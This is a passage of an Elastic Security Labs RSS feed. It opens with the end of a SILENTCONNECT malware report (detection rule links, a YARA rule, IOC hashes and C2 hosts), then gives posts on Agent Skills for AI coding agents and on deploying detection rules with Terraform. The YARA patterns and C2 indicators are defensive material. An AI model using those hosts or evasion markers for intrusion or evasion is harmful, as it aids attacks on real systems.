<li><a href="https://attack.mitre.org/techniques/T1027/">Obfuscated Files or Information</a></li>
</ul>
<h2><strong>Detecting SILENTCONNECT</strong></h2>
<ul>
<li><a href="https://github.com/elastic/endpoint-rules/blob/main/rules/windows/command_and_control_ingress_exe_transfer_via_curl.toml">Ingress Tool Transfer via CURL</a></li>
<li><a href="https://github.com/elastic/endpoint-rules/blob/main/rules/windows/command_and_control_webservice_lolbas.toml">Connection to WebService by a Signed Binary Proxy</a></li>
<li><a href="https://github.com/elastic/endpoint-rules/blob/main/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml">UAC Bypass via ICMLuaUtil Elevated COM Interface</a></li>
<li><a href="https://github.com/elastic/endpoint-rules/blob/main/rules/windows/execution_suspicious_powershell_cmdline.toml">Suspicious PowerShell Execution</a></li>
<li><a href="https://github.com/elastic/endpoint-rules/blob/main/rules/windows/defense_evasion_defender_exclusion_via_wmi.toml">Windows Defender Exclusions via WMI</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/execution_windows_powershell_susp_args.toml">Suspicious Windows Powershell Arguments</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/command_and_control_tool_transfer_via_curl.toml">Potential File Transfer via Curl for Windows</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/command_and_control_common_webservices.toml">Connection to Commonly Abused Web Services</a></li>
</ul>
<h4>YARA</h4>
<p>Elastic Security has created the following YARA rules to identify this activity:</p>
<pre><code>rule Windows_Trojan_SilentConnect_cdc03e84 {
    meta:
        author = &quot;Elastic Security&quot;
        creation_date = &quot;2026-03-04&quot;
        last_modified = &quot;2026-03-04&quot;
        os = &quot;Windows&quot;
        arch = &quot;x86&quot;
        threat_name = &quot;Windows.Trojan.SilentConnect&quot;
        reference_sample = &quot;8bab731ac2f7d015b81c2002f518fff06ea751a34a711907e80e98cf70b557db&quot;
        license = &quot;Elastic License v2&quot;
    strings:
        $peb_evade = &quot;winhlp32.exe&quot; wide fullword
        $rev_elevation = &quot;wen!rotartsinimdA:noitavelE&quot; wide fullword
        $masquerade_peb_str = &quot;MasqueradePEB&quot; ascii fullword
        $guid = &quot;3E5FC7F9-9A51-4367-9063-A120244FBEC7&quot; wide fullword
        $unique_str = &quot;PebFucker&quot; ascii fullword
        $peb_shellcode = { 53 48 31 DB 48 31 C0 65 48 8B 1C 25 60 00 00 00 }
        $rev_screenconnect = &quot;tcennoCneercS&quot; ascii wide
    condition:
        5 of them
}
</code></pre>
<h2>Observations</h2>
<p>The following observables were discussed in this research.</p>
<table>
<thead>
<tr>
<th align="left">Observable</th>
<th align="left">Type</th>
<th align="left">Name</th>
<th align="left">Reference</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>281226ca0203537fa422b17102047dac314bc0c466ec71b2e6350d75f968f2a3</code></td>
<td align="left">SHA-256</td>
<td align="left">E-INVITE.vbs</td>
<td align="left">VBScript</td>
</tr>
<tr>
<td align="left"><code>adc1cf894cd35a7d7176ac5dab005bea55516bc9998d0c96223b6c0004723c37</code></td>
<td align="left">SHA-256</td>
<td align="left">2025Trans.vbs</td>
<td align="left">VBScript</td>
</tr>
<tr>
<td align="left"><code>81956d08c8efd2f0e29fd3962bcf9559c73b1591081f14a6297e226958c30d03</code></td>
<td align="left">SHA-256</td>
<td align="left">FileR.txt</td>
<td align="left">C#</td>
</tr>
<tr>
<td align="left"><code>c3d4361939d3f6cf2fe798fef68d4713141c48dce7dd29d3838a5d0c66aa29c7</code></td>
<td align="left">SHA-256</td>
<td align="left">ScreenConnect.ClientSetup.msi</td>
<td align="left">SCREENCONNECT Installer</td>
</tr>
<tr>
<td align="left"><code>8bab731ac2f7d015b81c2002f518fff06ea751a34a711907e80e98cf70b557db</code></td>
<td align="left">SHA-256</td>
<td align="left"></td>
<td align="left">SILENTCONNECT</td>
</tr>
<tr>
<td align="left"><code>86.38.225[.]59</code></td>
<td align="left">ipv4-addr</td>
<td align="left"></td>
<td align="left">ScreenConnect  C2 Server</td>
</tr>
<tr>
<td align="left"><code>bumptobabeco[.]top</code></td>
<td align="left">domain</td>
<td align="left"></td>
<td align="left">ScreenConnect C2 Server</td>
</tr>
<tr>
<td align="left"><code>instance-lh1907-relay.screenconnect[.]com</code></td>
<td align="left">domain</td>
<td align="left"></td>
<td align="left">ScreenConnect C2 Server</td>
</tr>
<tr>
<td align="left"><code>349e78de0fe66d1616890e835ede0d18580abe8830c549973d7df8a2a7ffdcec</code></td>
<td align="left">SHA-256</td>
<td align="left">ViewDocs.exe</td>
<td align="left">Syncro Installer</td>
</tr>
</tbody>
</table>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/silentconnect-delivers-screenconnect.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Get started with Elastic Security from your AI agent]]></title>
            <link>https://www.elastic.co/security-labs/agent-skills-elastic-security</link>
            <guid>agent-skills-elastic-security</guid>
            <pubDate>Tue, 17 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Go from zero to a fully populated Elastic Security environment without leaving your IDE, using open source Agent Skills.]]></description>
            <content:encoded><![CDATA[<h2>Get started with Elastic Security from your AI agent</h2>
<p><a href="https://github.com/elastic/agent-skills/tree/main">Elastic Agent Skills</a> are open source packages that give your AI coding agent native Elastic expertise. If you're already using <a href="https://www.elastic.co/security-labs/from-alert-fatigue-to-agentic-response">Elastic Agent Builder</a>, you get AI agents that work natively with your security data. Agent Skills are for the other side: bringing that same Elastic Security knowledge to the external AI tools your team already uses, like Cursor, Claude Code, or GitHub Copilot.</p>
<p>If you use an AI coding agent and want to evaluate Elastic Security, or you're a security team that wants to get up and running with Elastic Security fast without navigating setup docs, these are for you. Today we're shipping security skills that take you from zero to a fully populated Elastic Security environment, without leaving your integrated development environment (IDE).</p>
<p>Before you dive in, note that this is a v0.1.0 release. Also, review <a href="https://github.com/elastic/agent-skills/blob/main/README.md">this documentation</a> for steps to get started and important security considerations.</p>
<h3>Step 1: Create a security project</h3>
<p>You open your AI coding agent and prompt: <em>Create a Security project on Elastic Cloud.</em></p>
<p>The <a href="https://github.com/elastic/agent-skills/tree/main/skills/cloud/create-project"><code>create-project</code></a> skill provisions an Elastic Cloud Serverless Security project via the Elastic Cloud API, handles credentials securely, and hands you back your Elasticsearch and Kibana URLs.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/image1.png" alt="Confirmation message showing a new Elastic Security project named “security‑eval” created in the us‑east‑1 region, with saved credentials and links to Elasticsearch and Kibana." title="Confirmation message showing a new Elastic Security project named “security‑eval” created in the us‑east‑1 region, with saved credentials and links to Elasticsearch and Kibana." /></p>
<p>Elastic Cloud Serverless supports regions across Amazon Web Services (AWS), Google Cloud Platform (GCP), and Azure, so you can pick whichever fits your environment.</p>
<p>One prompt. Project ready.</p>
<h3>Step 2: Generate sample data</h3>
<p>An empty Elastic Security project isn't very convincing. No alerts, no timelines, no process trees. You need data, but you don't always want to enable real sources of data before you've had a chance to explore.</p>
<p>The <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/generate-security-sample-data"><code>generate-security-sample-data</code></a> skill populates your project with realistic, Elastic Common Schema–compliant (ECS-compliant) security events and synthetic alerts across four attack scenarios:</p>
<ul>
<li><strong>Windows ransomware chain:</strong> Word macro to PowerShell to ransomware deployment, complete with process trees that light up the Analyzer view.</li>
<li><strong>Credential access:</strong> LSASS memory dumps and credential harvesting.</li>
<li><strong>AWS cloud privilege escalation:</strong> IAM policy manipulation and unauthorized access key creation.</li>
<li><strong>Okta identity attack:</strong> Multifactor authentication (MFA) factor deactivation and suspicious authentication patterns.</li>
</ul>
<p>These aren't random events. Every alert maps to <a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/mitre-attandckr-coverage"><strong>MITRE ATT&amp;CK</strong></a> techniques. Process trees have proper entity IDs so the <strong>Analyzer</strong> renders real parent-child relationships. <strong>Attack Discovery</strong> picks up the correlated threat narratives. You get the experience of a live environment without needing one.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/image4.png" alt="Interface showing generated sample security data with 301 indexed events, 15 synthetic alerts, and a prompt to open Kibana Security alerts." title="Interface showing generated sample security data with 301 indexed events, 15 synthetic alerts, and a prompt to open Kibana Security alerts." /></p>
<p>When you're done exploring, ask your AI coding agent to remove the sample data. All sample events, alerts, and cases are cleaned up without affecting the rest of your environment.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/image2.png" alt="Terminal output confirming that sample events, alerts, and cases have been removed." title="Terminal output confirming that sample events, alerts, and cases have been removed." /></p>
<h3>Step 3: What's next after sample data</h3>
<p>Once your environment is populated, the same AI coding agent can help you work with it. We're also shipping skills for <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/alert-triage"><strong>alert triage</strong></a> (fetch and investigate alerts, classify threats, and acknowledge alerts), <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/detection-rule-management"><strong>detection rule management</strong></a> (find noisy rules, add exceptions, and create new coverage), and <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/case-management"><strong>case management</strong></a> (create and track security operations center [SOC] cases and link alerts to incidents).</p>
<h3>Why skills, not just docs?</h3>
<p>Elastic's API documentation is <a href="https://www.elastic.co/docs/api/">public</a>. Your AI agent can already read it. So why do skills matter?</p>
<p>Skills matter because docs describe individual endpoints and encode workflows. There's a real gap between knowing that <code>POST /api/detection_engine/signals/search</code> exists and knowing that you need to fetch the oldest unacknowledged alert, query the process tree and related alerts within a five-minute window of the trigger time, check for an existing case before creating a new one, attach the alert with its rule UUID, and then acknowledge all related alerts on the same host, in that order, with the right field names, across three different APIs.</p>
<p>Skills also encode what <em>not</em> to do: Never display credentials in chat, confirm before creating billable resources, and handle Serverless-specific API quirks. This is the expert knowledge that turns a general-purpose AI agent into one that actually knows Elastic.</p>
<h3>Get started</h3>
<p>All <a href="https://github.com/elastic/agent-skills">skills</a> are open source and work with any supported AI coding agent:</p>
<ul>
<li>Cursor</li>
<li>Claude Code</li>
<li>GitHub Copilot</li>
<li>Windsurf</li>
<li>Cline</li>
<li>OpenCode</li>
<li>Gemini CLI</li>
</ul>
<p>Open a terminal in your project workspace and run:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/image3.png" alt="Code line: npx skills add elastic/agent-skills." title="Code line: npx skills add elastic/agent-skills" /></p>
<p>Or install specific skills:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/image5.png" alt="Code lines to add specific skills." title="Code lines to add specific skills." /></p>
<p>Check out the full catalog at <a href="https://github.com/elastic/agent-skills">github.com/elastic/agent-skills</a>.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/agent-skills-elastic-security.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Managing Elastic Security Detection Rules with Terraform]]></title>
            <link>https://www.elastic.co/security-labs/managing-rules-with-terraform</link>
            <guid>managing-rules-with-terraform</guid>
            <pubDate>Fri, 13 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn to define and deploy Elastic Security detection rules and exceptions using the Elastic Stack Terraform Provider vs detection-rules repository DaC capabilities.]]></description>
            <content:encoded><![CDATA[<p>At the core of Elastic Security lie <a href="https://www.elastic.co/blog/elastic-security-detection-engineering">outstanding detection capabilities</a>, allowing users to <a href="https://www.elastic.co/blog/elastic-security-building-effective-threat-hunting-detection-rules">create</a>, test, tune, manage, deploy detection rules, as code, in their environments. The ability to create robust detections is critical for Security Operations as detection logic elevates threat signal from the telemetry noise.</p>
<p>This article highlights how Elastic's new Terraform resources for security detection rules and exceptions expand practitioners' capabilities for detection-as-code deployment. Below you will find examples of defining and deploying your detection artifacts in Elastic Security with Terraform. We will also show how you can use Elastic's AI Agent to help quickly create the Terraform configuration for your custom rules. Finally, it also provides guidance on when to use the Elastic Stack Terraform <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_detection_rule">provider</a> versus <a href="https://github.com/elastic/detection-rules/blob/main/README.md#detections-as-code-dac">tools from the detection-rules repository</a>.</p>
<h2>Managing Elastic with Terraform</h2>
<p><a href="https://developer.hashicorp.com/terraform">Terraform is</a> a tool created by HashiCorp (now IBM) to manage infrastructure in the cloud, or in self-managed environments, as code. With a simple stroke of HCL (HashiCorp configuration language), users can define the desired state of their cloud provider infrastructure, application, configuration, and in Elastic’s case, cluster settings, configuration, indices or streams, and now also detection rules and alerts, as fully configurable, traceable, and reviewable code in your favorite source management tool.</p>
<p>The <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_detection_rule">Elastic Stack Terraform provider</a> helps search, observability, and security professionals, as well as DevOps and SREs, configure their Elastic clusters with the right indices and mappings for their search use cases, SLOs or Fleet policies for their observability use case, and now, detection rules, alerts, and exceptions for their security use case. It can easily configure those, and many more objects and settings in the Elastic Stack.</p>
<h2>Security Detection rules - now as code with Terraform</h2>
<p>With <a href="https://github.com/elastic/terraform-provider-elasticstack/releases/tag/v0.12.0">V0.12.0</a> and <a href="https://github.com/elastic/terraform-provider-elasticstack/releases/tag/v0.13.0">V0.13.0</a> of the <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_detection_rule">Elastic Stack Terraform provider,</a> users can now manage their Detection rules and rule exceptions using Terraform. This is especially useful for users who have already been managing their Elastic deployments with Terraform and want to extend it to Detection rules.</p>
<h3>Using the Elastic Stack Terraform Provider to deploy Rules and Exceptions</h3>
<p>Let's look at an example of using the Elastic Stack Terraform Provider to deploy an Elastic Security Rule. In this example, we want to detect Windows Service Accounts that are performing an interactive logon on a host.</p>
<p>Service accounts typically have elevated privileges and rarely-rotated passwords, making them high-value targets for attackers. Since these accounts should only perform automated service logons, an interactive logon can indicate credential theft or misuse.</p>
<p>The first thing we need to think of is what telemetry we need to see which logons are happening on our host. <a href="https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4624">Logon events</a> are logged by the Windows Local Security Authority Subsystem Service (LSASS) whenever a logon session is successfully created on the machine. We can pick this up via an Elastic Agent with the <a href="https://www.elastic.co/docs/reference/integrations/windows">Windows Integration</a> installed.</p>
<p>The data will be written by the Elastic Agent into the system.security Data Stream, we can match it with this index pattern: <code>logs-system.security-*.</code> We also know that Logon events generate event code <code>4624</code> and that, in our example, the service account name starts with <code>svc</code> or ends with <code>$</code>.  In addition, an interactive login will have a logon type of <code>interactive</code>.</p>
<p>So, we can match these events with an <a href="https://www.elastic.co/docs/reference/query-languages/esql">ES|QL</a> rule like:</p>
<pre><code class="language-sql">FROM logs-system.security-\*  
| WHERE event.code \== &quot;4624&quot; AND (user.name LIKE &quot;svc\_\*&quot; OR user.name LIKE &quot;svc-\*&quot;  
     OR user.name LIKE &quot;\*\_svc&quot; OR user.name LIKE &quot;\*$&quot;)  
     AND winlog.logon.type IN (&quot;Interactive&quot;, &quot;RemoteInteractive&quot;,  
         &quot;CachedInteractive&quot;, &quot;CachedRemoteInteractive&quot;)  
</code></pre>
<p>There may be situations where we don't want this rule to run, for example, if there is a legacy application that we want to permit interactive logons from. So, we can create an <a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/rule-exceptions">Exception Item</a>, like: <code>user.name IS svc\_sqlbackup</code>.</p>
<p>Now that we know what we want the Rule and its Exceptions to look like, we can use the Terraform provider's <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_detection_rule">elasticstack_kibana_security_detection_rule</a>, <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_exception_list">elasticstack_kibana_security_exception_list</a>, and <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_exception_item">elasticstack_kibana_security_exception_item</a> resources to define them in code.</p>
<p>Turning ES|QL rules into Terraform's configuration syntax, <a href="https://developer.hashicorp.com/terraform/language/syntax/configuration">HCL</a>, is a great use case for Elastic's <a href="https://www.elastic.co/docs/solutions/security/ai/agent-builder/agent-builder">AI Agent</a>.<br />
Elastic AI Agent capabilities help accelerate security operations across a wide range of tasks - from <a href="https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">alerts triage and incident response</a> to helping with detection lifecycle tasks.</p>
<p>Simply open AI Agent, and ask it to create Terraform configurations based on your query and exceptions.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/managing-rules-with-terraform/image2.png" alt="" /></p>
<p>You should end up with something like this:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/managing-rules-with-terraform/image1.png" alt="" /></p>
<p>Here's a closer look at the code.</p>
<p>There are a few elements to call out specifically:</p>
<ul>
<li><code>type</code>: The type of exception list. For example: detection, endpoint, or endpoint_trusted_apps</li>
<li><code>namespace_type</code>: Determines whether the exception list is available in all Kibana spaces or just the single space in which it was created.</li>
</ul>
<pre><code>resource &quot;elasticstack_kibana_security_exception_list&quot; &quot;svc_account_interactive_login&quot; {
  list_id        = &quot;svc-account-interactive-login-exceptions&quot;
  name           = &quot;Service Account Interactive Login Exceptions&quot;
  description    = &quot;Documented exceptions for service accounts that legitimately require interactive logon&quot;
  type           = &quot;detection&quot;
  namespace_type = &quot;single&quot;
  tags           = [&quot;service-accounts&quot;,&quot;windows&quot;,&quot;authentication&quot;]
}  
</code></pre>
<p>This creates a new exception list.</p>
<p>Of note, the <code>entries</code> array contains the conditions under which the exception applies.</p>
<pre><code>resource &quot;elasticstack_kibana_security_exception_item&quot; &quot;svc_sqlbackup&quot; {
  list_id        = elasticstack_kibana_security_exception_list.svc_account_interactive_login.list_id
  item_id        = &quot;svc-sqlbackup-exception&quot;
  name           = &quot;svc_sqlbackup - Legacy SQL Backup Agent&quot;
  description    = &quot;Approved exception: Legacy SQL backup agent requires interactive logon per vendor documentation.&quot;
  type           = &quot;simple&quot;
  namespace_type = &quot;single&quot;
  tags           = [&quot;sql&quot;,&quot;backup&quot;,&quot;approved&quot;]
entries = [
    {
      field    = &quot;user.name&quot;
      type     = &quot;match&quot;
      operator = &quot;included&quot;
      value    = &quot;svc_sqlbackup&quot;
    }
  ]
} 
</code></pre>
<p>This adds our exception: that we don't want the rule to run if the username is <code>svc\_sqlbackup</code>.</p>
<p>Of note, the elements from <code>enabled</code> to the <code>technique</code> array are examples of the other properties that can be set on a rule.</p>
<pre><code>resource &quot;elasticstack_kibana_security_detection_rule&quot; &quot;svc_account_interactive_login&quot; {
  name        = &quot;Service Account Interactive Login&quot;
  description = &lt;&lt;-EOT
    Detects interactive logins by service accounts. Service accounts should authenticate
    via service (Type 5) or batch (Type 4) logon types, not interactively. Interactive
    logins by service accounts may indicate credential theft or misuse.

    This rule identifies service accounts by common naming conventions (svc_*, svc-*,
    *_svc) and managed service accounts (*$).
  EOT

  type     = &quot;esql&quot;
  language = &quot;esql&quot;
  query    = &lt;&lt;-EOT
    FROM logs-system.security-* metadata _id, _version, _index
    | WHERE event.code == &quot;4624&quot;
      AND (user.name LIKE &quot;svc_*&quot; OR user.name LIKE &quot;svc-*&quot; OR user.name LIKE &quot;*_svc&quot; OR user.name LIKE &quot;*$&quot;)
      AND winlog.logon.type IN (&quot;Interactive&quot;, &quot;RemoteInteractive&quot;, &quot;CachedInteractive&quot;, &quot;CachedRemoteInteractive&quot;)
    | KEEP @timestamp, host.name, user.name, user.domain, winlog.logon.type, source.ip, _id, _version, _index
  EOT

  enabled    = true 
  severity   = &quot;high&quot;
  risk_score = 73

  from     = &quot;now-6m&quot;
  to       = &quot;now&quot;
  interval = &quot;5m&quot;

  author  = [&quot;Security Team&quot;]
  license = &quot;Elastic License v2&quot;
  tags    = [
    &quot;Domain: Endpoint&quot;,
    &quot;OS: Windows&quot;,
    &quot;Use Case: Identity and Access Audit&quot;,
    &quot;Tactic: Initial Access&quot;,
    &quot;Data Source: Windows Security Event Log&quot;
  ]

  false_positives = [
    &quot;Service accounts with documented exceptions that require interactive logon&quot;,
    &quot;Break-glass procedures during incident response&quot;,
    &quot;Initial service account configuration or troubleshooting&quot;
  ]

  references = [
    &quot;https://learn.microsoft.com/en-us/entra/architecture/service-accounts-on-premises&quot;,
    &quot;https://blog.quest.com/10-microsoft-service-account-best-practices/&quot;,
    &quot;https://attack.mitre.org/techniques/T1078/002/&quot;
  ]

  threat = [
    {
      framework = &quot;MITRE ATT&amp;CK&quot;
      tactic = {
        id        = &quot;TA0001&quot;
        name      = &quot;Initial Access&quot;
        reference = &quot;https://attack.mitre.org/tactics/TA0001/&quot;
      }
      technique = [
        {
          id        = &quot;T1078&quot;
          name      = &quot;Valid Accounts&quot;
          reference = &quot;https://attack.mitre.org/techniques/T1078/&quot;
          subtechnique = [
            {
              id        = &quot;T1078.002&quot;
              name      = &quot;Domain Accounts&quot;
              reference = &quot;https://attack.mitre.org/techniques/T1078/002/&quot;
            }
          ]
        }
      ]
    }
  ]

  exceptions_list = [
    {
      id             = elasticstack_kibana_security_exception_list.svc_account_interactive_login.id
      list_id        = elasticstack_kibana_security_exception_list.svc_account_interactive_login.list_id
      namespace_type = elasticstack_kibana_security_exception_list.svc_account_interactive_login.namespace_type
      type           = elasticstack_kibana_security_exception_list.svc_account_interactive_login.type
    }
  ]
}
</code></pre>
<p>Finally, we define the rule, including the ES|QL query we provided earlier and MITRE ATT&amp;CK classification.</p>
<p>You can add these resource definitions into one configuration file (perhaps security-rules.tf), add it to your <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs#kibana">configured</a> Elastic Stack terraform directory, and then run the `terraform apply` command and parameter to deploy the Rule.</p>
<pre><code class="language-shell">terraform apply --auto-approve
</code></pre>
<p>Since <code>terraform apply</code> runs a plan before making changes, it will automatically detect if anyone has edited a rule directly in Kibana and show you exactly what drifted: no manual exports or diffs needed.</p>
<p>After Terraform has made the changes, we can see the Rule in Kibana:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/managing-rules-with-terraform/image5.png" alt="" /></p>
<p>We can also see the Exception List:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/managing-rules-with-terraform/image4.png" alt="" /></p>
<p>This way, you can define your detections in Terraform and benefit from automatic deployment along with other objects you manage with Terraform.</p>
<h2>Terraform workspaces for multi-space Elastic deployments</h2>
<p>Terraform uses a concept called “<a href="https://developer.hashicorp.com/terraform/language/state/workspaces">workspaces</a>” allowing you to reuse the same infrastructure code for multiple deployments, for example, a dev, testing, and production environment. This concept is useful for managing rules across multiple deployments and/or Kibana spaces.</p>
<h2>Managing detections with Terraform and Detections as code</h2>
<p>Elastic also has <a href="https://www.elastic.co/security-labs/detection-as-code-timeline-and-new-features">Detections as Code functionality</a> available via our open <a href="https://github.com/elastic/detection-rules">detection-rules repository.</a></p>
<p>The two tools have complementary strengths and are aligned with different user profiles and workflow stages for implementing Detections as Code.</p>
<h3>Detection as Code features in detection-rules</h3>
<ul>
<li><strong>Best fit user profile</strong>: Detection engineers</li>
<li><strong>Intended workflow phase</strong>: Rule authoring and validation</li>
</ul>
<p>With dual-sync between your GitHub repo and Kibana, linting, schema validation, and unit-testing, detection-rules functionality is well-suited to experienced Detection Engineers comfortable with Git-based version control.</p>
<h3>Elastic Stack Terraform Provider</h3>
<ul>
<li><strong>Best fit user profile</strong>: DevOps engineers / Platform teams</li>
<li><strong>Intended workflow phase</strong>: Deployment and operations</li>
</ul>
<p>For users already using Terraform to manage their Elastic clusters, the Terraform Provider is a great fit, bringing consistency to all &quot;x-as-code&quot; operations and familiar state management and parameterization.</p>
<p>The key differences and optimal use cases for each tool are detailed in the comparison table below:</p>
<table>
<thead>
<tr>
<th align="left">Workflow Stage</th>
<th align="left">detection-rules</th>
<th align="left">Terraform Provider</th>
<th align="left">Best Fit</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><strong>Rule Authoring</strong></td>
<td align="left">Purpose-built tooling: create-rule wizard, TOML schema, KQL/EQL validation, field checks against ECS, Kibana-to-code export.</td>
<td align="left">Standard HCL definitions; teams integrate their preferred validation tooling into existing pipelines.</td>
<td align="left"><strong>detection-rules:</strong> Detection engineers authoring and refining rules daily. Teams wanting to automatically convert rules from Kibana into code. <strong>Terraform:</strong> Teams already using Terraform in their workflows, or teams wanting to automate and deploy detection rules as code, but without an established CI/CD platform.</td>
</tr>
<tr>
<td align="left"><strong>Testing &amp; Validation</strong></td>
<td align="left">Built-in unit testing framework, schema validation, query validation, configurable test suites.</td>
<td align="left">Terraform tests for optional unit testing. No built-in query validation: the provider relies on the Kibana API to accept or reject rule definitions at apply time.</td>
<td align="left"><strong>detection-rules:</strong> Teams wanting out-of-the-box detection testing. <strong>Terraform:</strong> Platform teams managing rules as part of broader IaC with existing validation pipelines. Teams happy to write custom tests in Terraform.</td>
</tr>
<tr>
<td align="left"><strong>Exception Management</strong></td>
<td align="left">Native exception list handling; export/import with rules, TOML storage, and rule linking.</td>
<td align="left">Exception lists can be referenced via rule attributes.</td>
<td align="left"><strong>detection-rules:</strong> Teams managing exceptions as part of detection content. <strong>Terraform:</strong> Teams managing exceptions as separate infrastructure resources.</td>
</tr>
<tr>
<td align="left"><strong>Governance &amp; Drift Management</strong></td>
<td align="left">VCS-based with dual sync: push rules from repo to Kibana and export from Kibana back to repo, allowing either to serve as the source of truth. Drift detection is achievable with custom export-and-diff tooling.</td>
<td align="left">VCS-authoritative: state file enforces declared configuration.  Native drift detection: Terraform plan surfaces any out-of-band changes made in Kibana.</td>
<td align="left"><strong>detection-rules:</strong> Teams comfortable with Git-based workflows and flexible sync models. <strong>Terraform:</strong> Organisations requiring formal state reconciliation and audit trails.</td>
</tr>
<tr>
<td align="left"><strong>Rollback</strong></td>
<td align="left">Git history provides version control; re-import previous versions from the repo.</td>
<td align="left">Revert HCL configuration in Git and re-apply to restore the previous state.</td>
<td align="left"><strong>detection-rules:</strong> Teams using Git-centric recovery workflows. <strong>Terraform:</strong> Organisations with standardised rollback mechanisms across infrastructure and rulesets.</td>
</tr>
<tr>
<td align="left"><strong>Parameterisation &amp; Templating</strong></td>
<td align="left">Achievable with external preprocessing (Jinja2, etc.) before import.</td>
<td align="left">Native HCL features: variables, locals, for_each, dynamic blocks, and modules.</td>
<td align="left"><strong>detection-rules:</strong> Teams not requiring parameterisation or with existing templating solutions.  <strong>Terraform:</strong> Teams wanting native IaC parameterisation.</td>
</tr>
<tr>
<td align="left"><strong>Operational Integration</strong></td>
<td align="left">Focused tooling optimised for detection engineering workflows.</td>
<td align="left">Unified control plane managing detection rules alongside cloud infrastructure, network policies, and other security tooling.  Integrates with other resources that may be required by detections such as external connectors.</td>
<td align="left"><strong>detection-rules:</strong> Specialist detection teams. More flexible if dual-sync (Kibana and repo are both sources of truth).  <strong>Terraform:</strong> Platform teams managing Elastic as part of broader infrastructure.</td>
</tr>
</tbody>
</table>
<p>In short, Detection Engineers are better served by the specialized creation and testing tools provided in the <code>detection-rules</code> repository, while DevOps/Platform Teams should use the Terraform provider to manage detection rules as part of their broader infrastructure-as-code strategy for deployment and operations.</p>
<h2>Try it out</h2>
<p>To experience the full benefits of what Elastic has to offer for detection engineers, upgrade to 9.3 or start your Elastic Security <a href="https://cloud.elastic.co/registration">free trial</a>. Visit <a href="https://www.elastic.co/security">elastic.co/security</a> to learn more and get started.</p>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/managing-rules-with-terraform/managing-rules-with-terraform.png" length="0" type="image/png"/>
        </item>
    </channel>
</rss>